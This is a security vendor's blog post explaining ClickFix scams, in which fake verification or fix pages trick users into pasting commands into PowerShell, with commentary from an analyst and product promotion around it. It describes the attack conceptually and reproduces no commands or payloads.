Home Blog That “Friendly” Prompt is ClickFix Published: March 25, 2026 That “Friendly” Prompt is ClickFix By: Beth Robinson Cybercrime isn’t the chaotic mess of random attacks people still imagine. It’s a booming global economy, projected to cost the world $12.2 trillion annually by 2031 . Social engineering is one of the main engines driving that growth. Attackers don’t get paid unless they get access, and as defenders level up, cybercriminals adapt, innovate, and scale. With the explosion of AI across the threat landscape, this means speed, customization, and precision of social engineering lures. The obvious phishing emails of a decade ago are getting phased out for sneakier, stealthier manipulation tactics, like ClickFix scams , designed to blend into everyday workflows, trusted habits, and overlooked obligations . Social engineering used to be easy to spot. That era is ending fast. Is your security stack ready for what’s to come? The internet trains you to click “If I did not see that (ClickFix) in a given day, I would be incredibly surprised and think something was wrong,” says Nick Roddy , Security Operations Analyst at Huntress. This also helps explain why ClickFix made up over 50% of all malware loader activity, according to the Huntress 2026 Cyber Threat Report . You've probably been through plenty of security awareness trainings, so you’re a pro at spotting phishing emails. You know not to click suspicious links, you double-check sender addresses, and you'd never hand over your credentials to an unsolicited login page. But what if the attack never looked like an attack at all? What if it looked like a routine tech support call, a human verification request, or a helpful website telling you exactly how to fix a browser crash? Think about how often websites ask you to do something slightly strange before granting access. Click all the images with a bicycle. Solve this puzzle. Check this box to prove you're not a robot. Over time, the internet has trained us to complete odd little rituals just to access content. ClickFix exploits that conditioning, and it’s exactly why it’s tripping up so many end users. More than half the time we're seeing click fix. We've definitely seen a lot of click fix within the last year. If I did not see that in a given day, I would be incredibly surprised to think something was wrong. Click fix is a very interesting type of attack in the sense that it's predominantly focused around social engineering. Threat actors are using the things that we are used to against us. Users have some kind of technical issue, right? They're looking online for a solution and you'll find these malicious websites that say, oh yeah, you want to fix that? Come here. Here are the instructions. Run some Windows shortcut keys, paste some commands into a terminal or a PowerShell prompt and execute those, and that'll resolve your problems. And so they're actively executing code on behalf of the adversary on their system. It looked so legitimate, like even security professionals were looking at this and saying, hey, I could have actually fallen for this. Most organizations don't get compromised because a user purposefully did something wrong. You can have the most secure environment in the entire world, but all it takes is one person to give away the keys to the kingdom, and then a threat actor is in. Educating your employees that there is a new threat makes them aware when they first encounter it that this isn't just normal, more weird stuff the internet's asking you to do to access a webpage. It is crucial to make sure you're actually investing in your team with like security awareness training type materials so they understand the threats that they actually face. If we can stop people from falling for these, overall, we're more secure. Download the Hundre's twenty twenty six Cyber Threat Report to stay ahead of the cybercriminals targeting your business. The attack that feels like help ClickFix works by tricking users into executing malicious commands on their own systems. Rather than dropping malware through a link or attachment, attackers manipulate victims into doing the work themselves by copying and pasting code into a PowerShell prompt, a Run window, or a terminal. And it abuses functionalities across native Windows, Mac, and Linux operating systems. Attackers get the same access without the noise of a traditional malware attack. Because the user ran the command themselves, no suspicious files were downloaded, and there was no unsolicited phishing link to second-guess later. Figure 1: Human verification lure From copy-paste to full compromise Because human trust is a moving target, attackers are always innovating to scale their initial access opportunities and reduce drag on tradecraft warning signs. ClickFix is no different. The chart below shows four types of ClickFix variants: Figure 2: ClickFix attack variations ClickFix might seem like a small copy/paste blunder. But that couldn’t be further from the truth. Here are two types of attack paths that started when a human fell for ClickFix prompts: Figure 3: Example of LummaC2 infostealer compromise after a ClickFix infection Figure 4: Example of an intrusion timeline after a ClickFix infection Why resilience is a winning bet Betting on prevention against today’s cybercrime business model is a loss. Of course, it matters, but trust will be exploited, mistakes will happen, and attacks will slip through. Your bragging rights will come from resilience: spotting threats fast, responding decisively, and containing damage before it spreads. Build systems, processes, and mindsets that survive when deception is inevitable. Assume it happens, don’t pretend it doesn’t. It’s the difference between being breached and staying in business. Get resilient endpoints and identities today with a Huntress free trial . Categories Cybersecurity Education Summarize with AI ChatGPT Claude Perplexity Google AI Summarize This Page ChatGPT Claude Perplexity Google AI Don't let "later" cost you Join us on May 20 (12pm EST) for _declassified, for an unfiltered look from Truman Kain at the overlooked security obligations that hit hard later. Register now Share On This Page We Are Huntress Phishing is everywhere. But it can be prevented. We Are Huntress Phishing is everywhere. But it can be prevented. Phishing is a cyberattack (usually email-based) that occurs when threat actors disguise themselves as legitimate entities to trick users into revealing personally identifiable or sensitive information.Phishing is one of the most common tactics used by hackers because it's efficient and effective. With new tools and tech like AI at their disposal, hackers can now send out convincing phishing attacks to the masses with little effort required. The good news: we can be one step ahead. Care is Compromised Medical services are disrupted, causing treatment delays, misdiagnoses, and even spikes in mortality rates. Data is Breached Sensitive patient data can be stolen and used for identity theft, blackmail, or sold online. Finances Take a Hit Ransom payments, recovery costs, and lost revenue are just a few of the financial hits. And don’t forget potential HIPAA fines. Patients Lose Trust Your reputation can suffer, and when that happens, your patients will go elsewhere for care. Legal Backlash Lawsuits from patients affected by a breach aren’t uncommon. You may also face regulatory penalties for non-compliance with data protection laws. Operational Chaos Accessing patient records, providing emergency care, and communicating among your staff becomes far more complex. Huntress is custom built for you. But don't take our word for it – hear directly from businesses like yours. Try Huntress for Free On This Page We Are Huntress Phishing is everywhere. But it can be prevented. Huntress Managed EDR in action See how our expert-led solution can help you stay one step ahead of threat actors—without overwhelming your in-house team or busting your budget. Start a Free Trial Schedule a Demo You Might Also Like Deepfake vs. the Three-Finger Test See why the viral "three-finger test" is almost outdated, and how to build resilient security processes that protect your organization from identity-based attacks and social engineering, no matter how advanced the AI gets. Learn More Gone Phishing: An Analysis of a Targeted User Attack Get an inside look at how threat actors use phishing and social engineering tactics to target users and infiltrate organizations. Learn More The Craftiest Trends, Scams, and Tradecraft of 2025 (So Far) John Hammond and Greg Linares with Huntress discuss the top tradecraft we’ve seen this year so far, from ClickFix attacks to deepfake social engineering Learn More Don’t Sweat the *Fix Techniques Learn how ClickFix techniques like FileFix, TerminalFix, and DownloadFix trick users into compromising. Then, learn proven detection methods using chokepoint strategies and behavioral analytics. Learn More AMOS Stealer Exploits AI Trust: Malware Delivered Through ChatGPT and Grok Attackers are exploiting user trust in AI and aggressive SEO to deliver an evolved Atomic macOS Stealer. Learn why this social engineering tradecraft bypasses traditional network controls and the future of macOS infostealer defense. Learn More Teach Yourself to Phish: The Strategy Behind Phishing Simulations Get ready for a phishing trip! Learn about the strategy behind phishing simulations and how it can help your organization build resilience against real phishing threats. Learn More How a College Student Lost $10,000 to “The IRS” In this testimonial, learn firsthand from one of our Security Awareness Consultants at Curricula about how a fake IRS phishing scam worked on one student. Learn More Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack A new attack vector enables hackers to more easily compromise users with malicious Microsoft Office documents. Learn More Sign Up for Huntress Updates Get insi